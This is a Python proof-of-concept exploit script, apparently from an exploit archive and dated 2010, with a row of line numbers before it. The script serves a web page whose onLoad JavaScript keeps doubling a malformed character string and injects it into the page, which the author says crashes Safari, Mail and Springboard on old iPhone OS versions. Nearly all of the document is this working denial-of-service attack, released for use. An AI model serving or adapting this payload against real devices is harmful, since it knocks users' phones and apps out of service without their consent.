1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 |
#!/usr/bin/python #iPhone Springboard crash PoC by Chase Higgins. Devices tested: iPhone 2G @ OS 3.1, iPhone 3GS @ 3.1.3 #this script acts as webserver, and causes Safari, as well as Mail and Springboard to crash #all these apps crash after running this exploit on the iPhone. Unable to debug any of these processes as the gdb on my #device is acting up, original iPhone is just too low memory to further test this exploit, so I am releasing it # Exploit Title: iPhone Springboard Malformed Character Crash PoC # Date: 3/15/2010 # Author: Chase Higgins # Software Link: apple.com/iphone/ # Version: iPhone 2G, iPhone 3GS # Tested on: iPhone OS 3.1, and iPhone OS 3.1.3 # CVE : # Code : none import sys, socket; def main(): html = """ <html> <head> <script> function triggerCrash(){ evil_div = document.getElementById('evilDiv'); var evil_string = "\x4e\x5b\x01"; i = 0; while (i < 1000){ evil_string = evil_string + evil_string; } evil_div.innerHTML = evil_string; } </script> </head> <body onLoad="triggerCrash()"> <div id="evilDiv"> </div> </body> </html> """; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.bind(('',2121)); s.listen(1); while True: channel, details = s.accept(); print channel.recv(1024); channel.send(html); channel.close(); main(); |